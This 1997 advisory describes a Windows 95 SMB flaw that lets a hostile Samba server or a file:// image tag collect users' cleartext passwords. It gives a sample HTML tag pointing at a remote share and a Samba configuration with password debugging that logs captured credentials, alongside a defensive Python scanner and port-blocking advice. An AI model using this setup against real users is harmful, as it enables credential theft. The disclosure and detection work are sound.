SMB Attacks on Windows 95
VERSIONS AFFECTED
Windows 95, with and without Internet Explorer.
DESCRIPTION
Apparently a new problem has been discovered that allows a malicious Web developer to snag a Windows 95
password in cleartext, given only the IP address and Workgroup name. The action could be done in such a
way that it leaves no noticeable trace whatsoever, which makes it incredibly dangerous indeed.
A Master Browser can be indirectly used as a tool against the machines it serves by introducing a hostile
host into the browse list. This exploit requires the use of a SAMBA server, which is a Unix-based rendition of
an SMB-compatible server.
Samba servers are capable of announcing themselves to a remote network (workgroup) on a different subnet,
given the workgroup name. An intruder may use this technique in two ways to gain access to a username
and password. They could introduce a share from the system they place in the browse list, and wait for a
user to make an attempt at accessing it - at which point the username and password are transmitted. They
could also embed the file:// tag into a Web page and wait for a user to arrive at that page - at which point the
Web browser would initiate a connection to the remote server named in the file:// tag, and promptly transmit
the username and password. Sample HTML tag:
<img src=file://\\testsystem/testshare/testfile.gif>
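As an added defensive illustration (not part of the original advisory), the following Python scanner inspects the HTML a site serves and flags any resource reference that an SMB-capable client would resolve over the network: file:// URLs naming a remote host (in the backslash form shown in the advisory, the file://///host form, and the plain file://host form) as well as raw \\host\share UNC paths. It distinguishes references a browser fetches automatically on page load (img, body background, script, frame and so on, the case described above) from those that need a click. The sample page, host names and share names are constructed for the example.

```python
"""Flag HTML references that would make an SMB-capable client open an
outbound SMB connection (and send credentials) when the page is viewed.
Added example; detection logic and sample HTML are constructed, not from
the advisory.  Standard library only."""
import re
from html.parser import HTMLParser

# Attribute slots a browser fetches without user interaction...
AUTO_FETCH = {("img", "src"), ("script", "src"), ("link", "href"),
              ("iframe", "src"), ("frame", "src"), ("embed", "src"),
              ("object", "data"), ("body", "background")}
# ...and slots that are only followed on a click.
ON_CLICK = {("a", "href"), ("area", "href"), ("form", "action")}


def smb_target(url):
    """Return (host, share) if url would be resolved via SMB/UNC, else None.

    Accepted forms: file://\\host\share\..., file://///host/share/...,
    file:////host/share/..., file://host/share/... and bare \\host\share\...
    Local forms (file:///C:/..., file://localhost/...) return None.
    """
    u = url.strip()
    if u[:5].lower() == "file:":
        body = u[5:]
    elif u.startswith("\\\\"):          # raw UNC path
        body = u
    else:
        return None
    seps, path = re.match(r"^([/\\]*)(.*)$", body, re.S).groups()
    # file: followed by exactly three separators is a local path (RFC 8089);
    # fewer than two separators is not a network reference at all.
    if len(seps) < 2 or len(seps) == 3:
        return None
    parts = re.split(r"[/\\]+", path, maxsplit=2)
    host = parts[0]
    share = parts[1] if len(parts) > 1 else ""
    if not host or host.lower() == "localhost" or re.fullmatch(r"[A-Za-z]:", host):
        return None
    return host, share


class SmbRefScanner(HTMLParser):
    """Collect every attribute value that points at an SMB/UNC target."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            target = smb_target(value)
            if target is None:
                continue
            key = (tag, name)          # HTMLParser lower-cases both already
            trigger = ("automatic" if key in AUTO_FETCH
                       else "on click" if key in ON_CLICK else "other")
            self.findings.append({"tag": tag, "attr": name, "url": value,
                                  "host": target[0], "share": target[1],
                                  "trigger": trigger})


def scan_html(html):
    """Return a list of findings (dicts) for the given HTML document."""
    scanner = SmbRefScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: two auto-fetched SMB references, two click-only
# references, and three harmless references (http, local drive, localhost).
SAMPLE_HTML = r"""<html><body background=file://\\fileserver\pub\bg.gif>
<img src="http://example.test/logo.gif">
<img src=file://\\testsystem/testshare/testfile.gif>
<a href="file://///nas01/share/readme.txt">docs</a>
<img src="file:///C:/local/picture.gif">
<a href="\\corp-srv\tools\setup.exe">installer</a>
<a href="file://localhost/etc/motd">motd</a>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['trigger']:9} <{f['tag']} {f['attr']}> -> "
              f"host={f['host']} share={f['share']}  ({f['url']})")
```

Run against a site's pages, the "automatic" findings are the ones that reproduce the advisory's scenario: a visitor's browser contacts the named host on its own, with no click required. The three-separator rule is what keeps ordinary file:///C:/... local references out of the report.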
TESTING
* Compile Samba using -DDEBUG_PASSWORD
* Employ the remote announce option in the smb.cfg file, specifying the remote host or broadcast address,
and workgroup name of the network you wish to test. Sample:
workgroup = TEST
preferred master = yes
domain master = yes
security = user
debug level = 100
remote announce = 10.0.0.255/WORKGROUP_NAME
* Establish a share on the Samba server. Sample:
[testt]
path = /tmp
public = no
browsable = yes
* If you wish, place one or more files in the directory, then start the smbd daemon. At this point, any SMB
related traffic (e.g. browsing the local machine) will cause the Samba server to announce itself to the remote
network specified. If the remote network is successfully contacted, the Samba server may be added to that
network's browse list.
Later, checking the Samba log will reveal any information it has collected about usernames and passwords.
Entries will look similar to this:
checking user=[username] pass=[password]
DEFENSE
Even though you need to have the remote network's workgroup name prior to this type of attack, keep in
mind that this name could be easily obtained using the Windows nbtstat command.
Also take note that it is VERY easy for a perpetrator to completely hide themselves during this attack by
making a few minor adjustments to their hostname and /etc/hosts file. In other words, this could be done in an
untraceable fashion in certain instances.
To stop this type of attack from outside your network (Internet), block access to inbound traffic destined for
ports 137, 138, and 139 on your network. This does not solve problems with this type of attack coming from
inside your network.
Microsoft was informed of this problem on March 17, 1997. Watch this page for more information.
Credits
Discovered by Steve Birnbaum with help from Mark Gazit.
Additional support from Yacov Drori and Roman Lasker.
Thanks to hobbit for his paper on CIFS,
Thanks also to BioH for helping to test this, and anyone else who helped or provided ideas.
Posted here at The NT Shop March 17, 1997 - 10:40pm